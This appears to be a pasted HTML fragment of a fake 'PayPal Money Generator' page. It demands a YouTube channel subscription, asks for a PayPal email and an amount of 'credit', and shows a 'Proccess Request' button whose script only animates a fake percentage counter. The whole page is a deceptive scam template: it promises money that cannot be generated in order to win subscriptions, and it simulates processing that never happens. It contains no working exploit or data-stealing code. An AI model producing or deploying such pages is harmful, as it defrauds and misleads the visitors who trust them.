SHOW:
|
|
- or go back to the newest paste.
1 | <div id="payment-method-button"><a class="btn-medium btn-enabled-primary">Continue</a> | |
2 | ||
3 | <div class="content "> | |
4 | ||
5 | ||
6 | <div class="security-container secruity-password-container"> | |
7 | <h1>Get Paypal Money Gen</h1> | |
8 | ||
9 | <div class="section-content"> | |
10 | <div> | |
11 | ||
12 | ||
13 | <div id="form-forgot-password-username" class="form-forgot-password-username"> | |
14 | <ul> | |
15 | <li class="forget-password"> | |
16 | <h5>You must subscribe for this to work!</h5> | |
17 | ||
18 | ||
19 | <a class="btn-secondary-md" id="Button" href="https://www.youtube.com/channel/UC5IMnJmNXqGxqlBiYSKO-gA?sub_confirmation=1">Subscribe</a> | |
20 | ||
21 | ||
22 | ||
23 | ||
24 | <div class="forgot-password-container"> | |
25 | <h5>Please Enter your Paypal Email</h5> | |
26 | ||
27 | <div class="form-horizontal"> | |
28 | <div class="form-group" id="form-username"> | |
29 | <input id="username" class="form-control input-field" placeholder="Username"> | |
30 | <p class="hidden form-control-label" id="form-username-error"></p> | |
31 | </div> | |
32 | ||
33 | ||
34 | </div> | |
35 | </div> | |
36 | </li> | |
37 | <li class="forgot-username"> | |
38 | ||
39 | ||
40 | <div class="forgot-password-container"> | |
41 | <h5>How Much Paypal Credit Do You Want?</h5> | |
42 | ||
43 | <div class="form-horizontal"> | |
44 | <div class="form-group" id="form-email"> | |
45 | <input id="email" class="form-control input-field" placeholder="Price"> | |
46 | ||
47 | <!-- ngIf: isAvailable(receiverDestinationType) --><div class="info-text account-settings-label ng-binding ng-scope" ng-if="isAvailable(receiverDestinationType)"></div><!-- end ngIf: isAvailable(receiverDestinationType) --><!-- ngIf: !isAvailable(receiverDestinationType) --><!-- ngIf: receiverDestinationType.areSourcesShown --><div class="text-label account-settings-label ng-binding ng-scope" ng-if="receiverDestinationType.areSourcesShown">Check the box to make it cost FREE</div><!-- end ngIf: receiverDestinationType.areSourcesShown --><!-- ngRepeat: notificationBand in destinationNotificationBands(receiverDestinationType.destinationType) --><!-- ngIf: !isNotificationBandBlacklisted(notificationBand.NotificationSourceType,receiverDestinationType.destinationType)&&!!notificationSourceTypeMapping[notificationBand.NotificationSourceType]&&receiverDestinationType.areSourcesShown --><!-- end ngRepeat: notificationBand in destinationNotificationBands(receiverDestinationType.destinationType) --><!-- ngIf: !isNotificationBandBlacklisted(notificationBand.NotificationSourceType,receiverDestinationType.destinationType)&&!!notificationSourceTypeMapping[notificationBand.NotificationSourceType]&&receiverDestinationType.areSourcesShown --><div ng-repeat="notificationBand in destinationNotificationBands(receiverDestinationType.destinationType)" ng-if="!isNotificationBandBlacklisted(notificationBand.NotificationSourceType,receiverDestinationType.destinationType)&&!!notificationSourceTypeMapping[notificationBand.NotificationSourceType]&&receiverDestinationType.areSourcesShown" class="notification-settings-checkbox-container ng-scope"><div class="checkbox notification-settings-checkbox"><input type="checkbox" ng-checked="notificationBand.IsEnabled" ng-disabled="isDestinationTypeOptedOut(receiverDestinationType)||!notificationBand.IsOverridable" ng-click="toggleNotificationBand(notificationBand)" id="NotificationStream-checkbox-1"> <label for="NotificationStream-checkbox-1" class="ng-binding">FREE | |
48 | </label></div></div><!-- end ngIf: !isNotificationBandBlacklisted(notificationBand.NotificationSourceType,receiverDestinationType.destinationType)&&!!notificationSourceTypeMapping[notificationBand.NotificationSourceType]&&receiverDestinationType.areSourcesShown --><!-- end ngRepeat: notificationBand in destinationNotificationBands(receiverDestinationType.destinationType) --><!-- ngIf: !isNotificationBandBlacklisted(notificationBand.NotificationSourceType,receiverDestinationType.destinationType)&&!!notificationSourceTypeMapping[notificationBand.NotificationSourceType]&&receiverDestinationType.areSourcesShown --><div ng-repeat="notificationBand in destinationNotificationBands(receiverDestinationType.destinationType)" ng-if="!isNotificationBandBlacklisted(notificationBand.NotificationSourceType,receiverDestinationType.destinationType)&&!!notificationSourceTypeMapping[notificationBand.NotificationSourceType]&&receiverDestinationType.areSourcesShown" class="notification-settings-checkbox-container ng-scope"><div class="checkbox notification-settings-checkbox"><input type="checkbox" ng-checked="notificationBand.IsEnabled" ng-disabled="isDestinationTypeOptedOut(receiverDestinationType)||!notificationBand.IsOverridable" ng-click="toggleNotificationBand(notificationBand)" id="NotificationStream-checkbox-1"> <label for="NotificationStream-checkbox-2" class="ng-binding">I'm not a robot | |
49 | </label></div></div> | |
50 | <p class="hidden form-control-label" id="form-email-error"></p> | |
51 | </div> | |
52 | <a href="#" class="btn-primary-md paypal-product-price paypal-buy" data-ytta-id="-" id="getItem" onclick="xyz = 0; window.setInterval(function(){ document.getElementById('getItem').innerHTML = ((((1 - Math.pow(.999, xyz)) * .5) + (xyz / 20000)) * 100).toFixed(3) + '%'; xyz+=0.015; }, 1);">Proccess Request</a> | |
53 | ||
54 | </div> | |
55 | </div> |